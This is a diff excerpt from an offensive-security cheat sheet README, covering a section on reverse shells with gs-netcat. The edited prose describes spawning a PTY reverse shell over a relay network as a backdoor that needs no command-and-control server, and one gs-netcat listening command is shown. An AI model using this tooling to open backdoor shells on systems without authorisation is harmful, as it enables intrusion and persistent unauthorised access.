hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 <a id="rswg-anchor"></a>
 **5.i.a.
 Reverse shell with gs-netcat**

-Install [gs-netcat](https://github.com/hackerschoice/gsocket).
+Use [gs-netcat](https://github.com/hackerschoice/gsocket).
 It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network.
-This means you do not need to run your own Command & Control server for the backdoor to connect back to.
-If netcat is the equivalent to a swiss army knife than gs-netcat is a german battle axe :>
+It uses 'password hashes' instead of IP addresses to connect.
+This means that you do not need to run your own Command & Control server for the backdoor to connect back to.
+If netcat is a swiss army knife than gs-netcat is a german battle axe :>

 ```
 $ gs-netcat -s MySecret -l -i    # Host